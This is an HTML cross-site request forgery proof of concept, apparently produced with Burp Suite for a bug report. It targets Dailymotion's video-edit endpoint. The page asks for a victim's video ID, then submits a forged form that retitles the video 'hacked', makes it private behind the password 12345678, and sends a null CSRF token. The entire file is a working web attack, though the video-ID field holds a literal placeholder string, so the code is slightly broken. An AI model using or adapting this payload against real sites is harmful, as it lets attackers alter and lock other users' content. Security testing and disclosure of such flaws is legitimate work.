<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>
  history.pushState('', '', '/');
  var video_ID = prompt("Enter the victim's video_ID")
  </script>
    <form action="https://www.dailymotion.com/pageitem/video/edit" method="POST">
      <input name="form&#95;name" value="dm&#95;pageitem&#95;video&#95;edit&#95;0" />
      <input name="&#95;fid" value="" />
      <input name="video&#95;title" value="hacked1111" />
      <input name="user&#95;category" value="people" />
      <input name="language" value="en" />
      <input name="description" value="hacked11111" />
      <input name="privacy" value="private&#45;password&#45;protected" />
      <input name="private&#45;password" value="12345678" />
      <input name="allow&#95;repost" value="1" />
      <input name="featured&#95;video" value="1" />
      <input name="recordedOn" value="" />
      <input name="videoId" value="+video_ID+" />
      <input name="videoUpdateTitle" value="video_ID" />
      <input name="extensionVideo" value="" />
      <input name="uploadType" value="" />
      <input name="saveStatus" value="fail" />
      <input name="from&#95;request" value="" />
      <input name="&#95;csrf&#95;l" value="null" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
